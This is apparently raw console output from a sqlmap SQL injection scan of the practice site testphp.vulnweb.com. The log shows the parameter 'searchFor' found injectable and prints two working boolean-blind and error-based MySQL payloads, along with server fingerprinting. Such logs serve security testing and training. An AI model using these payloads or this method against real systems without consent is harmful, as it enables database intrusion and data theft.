        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.9.7.7#dev}
|_ -| . ["]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:00:29 /2025-08-05/

[17:00:29] [INFO] testing connection to the target URL
[17:00:29] [INFO] checking if the target is protected by some kind of WAF/IPS
[17:00:30] [INFO] testing if the target URL content is stable
[17:00:30] [INFO] target URL content is stable
[17:00:30] [INFO] testing if POST parameter 'searchFor' is dynamic
[17:00:30] [WARNING] POST parameter 'searchFor' does not appear to be dynamic
[17:00:30] [INFO] heuristic (basic) test shows that POST parameter 'searchFor' might be injectable (possible DBMS: 'MySQL')
[17:00:30] [INFO] heuristic (XSS) test shows that POST parameter 'searchFor' might be vulnerable to cross-site scripting (XSS) attacks
[17:00:30] [INFO] testing for SQL injection on POST parameter 'searchFor'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 
[17:07:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:07:29] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[17:07:29] [WARNING] reflective value(s) found and filtering out
[17:07:29] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[17:07:29] [INFO] testing 'Generic inline queries'
[17:07:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[17:07:32] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[17:07:33] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[17:07:36] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[17:07:39] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[17:07:43] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[17:07:46] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[17:07:50] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[17:07:53] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[17:07:55] [INFO] POST parameter 'searchFor' appears to be 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' injectable (with --string="Our")
[17:07:55] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[17:07:55] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[17:07:55] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[17:07:55] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[17:07:55] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[17:07:55] [INFO] POST parameter 'searchFor' is 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' injectable 
[17:07:55] [INFO] testing 'MySQL inline queries'
[17:07:55] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[17:07:56] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[17:07:56] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[17:07:56] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[17:07:56] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[17:07:56] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[17:07:56] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[17:08:01] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[17:08:01] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[17:08:01] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[17:08:01] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[17:08:01] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[17:08:01] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[17:08:01] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[17:08:01] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)'
[17:08:01] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query)'
[17:08:01] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK)'
[17:08:01] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query)'
[17:08:02] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK - comment)'
[17:08:02] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query - comment)'
[17:08:02] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment)'
[17:08:02] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query - comment)'
[17:08:02] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[17:08:02] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[17:08:02] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[17:08:02] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[17:08:02] [INFO] testing 'MySQL AND time-based blind (ELT)'
[17:08:02] [INFO] testing 'MySQL OR time-based blind (ELT)'
[17:08:02] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[17:08:02] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[17:08:02] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[17:08:02] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[17:08:02] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[17:08:02] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[17:08:02] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (BENCHMARK)'
[17:08:02] [INFO] testing 'MySQL > 5.0.12 time-based blind - Parameter replace (heavy query - comment)'
[17:08:02] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[17:08:02] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[17:08:02] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[17:08:02] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[17:08:02] [INFO] testing 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (BENCHMARK)'
[17:08:02] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[17:08:02] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[17:08:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[17:08:06] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[17:08:07] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[17:08:07] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[17:08:08] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[17:08:09] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[17:08:10] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[17:08:11] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[17:08:12] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[17:08:13] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
POST parameter 'searchFor' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 819 HTTP(s) requests:
---
Parameter: searchFor (POST)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: searchFor=1' AND EXTRACTVALUE(1031,CASE WHEN (1031=1031) THEN 1031 ELSE 0x3A END) AND 'jUue'='jUue

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: searchFor=1' AND GTID_SUBSET(CONCAT(0x71717a7071,(SELECT (ELT(2271=2271,1))),0x7178767871),2271) AND 'LthK'='LthK
---
[17:10:40] [INFO] the back-end DBMS is MySQL
[17:10:40] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL >= 5.6
[17:10:41] [INFO] fetched data logged to text files under '/Users/revantpatel/.local/share/sqlmap/output/testphp.vulnweb.com'

[*] ending @ 17:10:41 /2025-08-05/

